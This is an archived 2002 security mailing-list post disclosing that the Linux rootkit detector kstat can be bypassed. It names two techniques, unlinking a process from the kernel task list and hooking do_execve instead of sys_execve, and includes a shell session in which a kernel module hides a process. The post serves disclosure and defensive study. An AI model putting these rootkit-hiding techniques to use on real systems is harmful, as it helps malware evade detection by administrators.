KSTAT (and maybe others) bypass

From: Dark Angel (dark0at_private)
Date: Thu Sep 05 2002 - 19:06:10 PDT


    It is possible to hide processes from kstat by removing their structs from the kernel's task_struct list.
    It is also possible to bypass kstat's checks on syscalls: if you modify a sub-function instead of the call (for example do_execve instead of sys_execve) the effect is the same, but for kstat all is okay:
    
    Shoikan:~/Phantasmagoria# ./kstat -P | grep kstat
     686	  403	  0	  0	  kstat
    Shoikan:~/Phantasmagoria# ./kstat -S             
    Probing System Calls FingerPrints... No System Call Modified!
    Shoikan:~/Phantasmagoria# insmod Phantasmagoria.o
    Shoikan:~/Phantasmagoria# ./Heider 403(the current shell pid) HIDE
    Hiding successfull
    Shoikan:~/Phantasmagoria# ./kstat -P | grep kstat
    Shoikan:~/Phantasmagoria# ./kstat -S
    Probing System Calls FingerPrints... No System Call Modified!
    Shoikan:~/Phantasmagoria# 
    
    Attached there is an English translation + proof-of-concept code of the original paper published on www.s0ftpj.org
    
    Regards
    
    -= Dark-Angel =-
    
    This archive was generated by hypermail 2b30 : Fri Sep 06 2002 - 18:17:12 PDT